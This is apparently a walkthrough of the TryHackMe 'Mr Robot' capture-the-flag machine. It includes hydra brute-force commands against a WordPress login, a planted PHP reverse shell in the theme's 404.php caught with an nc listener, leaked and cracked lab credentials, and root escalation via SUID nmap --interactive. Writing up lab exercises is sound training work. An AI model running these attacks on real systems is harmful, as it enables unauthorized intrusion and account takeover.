Init
Starting with an nmap scan, we have an HTTP server running.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-07 23:11 UTC
Nmap scan report for 10.201.32.43
Host is up (0.17s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 db:37:cf:3d:cd:a7:52:a5:36:23:3e:4b:74:62:79:32 (RSA)
| 256 76:4b:ff:81:1e:80:20:26:d0:98:fc:06:dd:9c:6d:39 (ECDSA)
|_ 256 09:3c:3a:6b:90:25:e7:98:70:53:49:86:68:96:1b:df (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.49 seconds
The HTTP server loads a fancy-looking site with a terminal-type interface. This is a WordPress-based site.

As this is a WordPress site, I can visit http://10.201.32.43/wp-login.php. The same is also found via a gobuster dir scan. There are a lot of common WordPress files found there.
One of the endpoints is /robots, which tells us about fsocity.dic and key-1-of-3.txt. So, we have one key; then let’s explore the .dic file.

The .dic file has a lot of words; it is just a dictionary after all. On the /wp-login endpoint, when I try a random username and password, the site shows “Invalid username”. So, probably I can use the dictionary to enumerate a valid username using hydra.

So, we use the given form body and then use hydra to find valid usernames.
hydra -L fsocity.dic -p password mrrobot.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.201.32.43%2Fwp-admin%2F&testcookie=1:Invalid username"

Then we can enumerate the password as:
hydra -l Elliot -P fsocity.dic mrrobot.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.201.32.43%2Fwp-admin%2F&testcookie=1:The password you entered for the username" -t 30
NOTE: For some reason, if we visit /license, it is a very big page, and when you scroll down you have the password as base64! ZWxsaW90OkVSMjgtMDY1Mgo=
User Flag

Here we have options to do some stuff to the website. Looking at “Appearance”, I edit the 404.php so that I can get a reverse shell. I use the code from https://www.revshells.com/, or you can use one from SecLists - SecLists/Web-Shells/PHP/Dysco.php
Then visiting http://10.201.32.43/random and poof, I get a shell as user daemon.
┌─[thm_truelyyours]─[10.2.0.159]─[truelyyours@parrot]─[~/tryhackme/Mr Robot CTF]
└──╼ [★]$ rlwrap nc -lvnp 9001
Listening on 0.0.0.0 9001
Connection received on 10.201.32.43 57968
Linux ip-10-201-32-43 5.15.0-139-generic #149~20.04.1-Ubuntu SMP Wed Apr 16 08:29:56 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
00:52:18 up 1:44, 0 users, load average: 0.01, 0.43, 0.93
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh: 0: can't access tty; job control turned off
$
$
$ ls
bin
boot
Going to /home, we have the user robot, who has a password file and the 2nd key. Just going to crackstation.net, we can crack the md5 password:
abcdefghijklmnopqrstuvwxyz
Privilege Escalation
So, now we are the user robot and have the 2nd key! To have a better shell, I SSH in using robot’s credentials. Loading linpeas.sh on the remote (at /tmp), among the binaries with the SUID bit set, we have nmap. Checking out gtfobins, we can use nmap --interactive to get a root shell!
robot@ip-10-201-32-43:/tmp$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
root@ip-10-201-32-43:/tmp# whoami
root
Now we can get the 3rd key at /root/key-3-of-3.txt!
Cheers on doing a very non-intuitive machine! May have been frustrating! TryHackMe can invest a bit more in infra and make it as stable as, or close to, HTB haha! 🎉🎉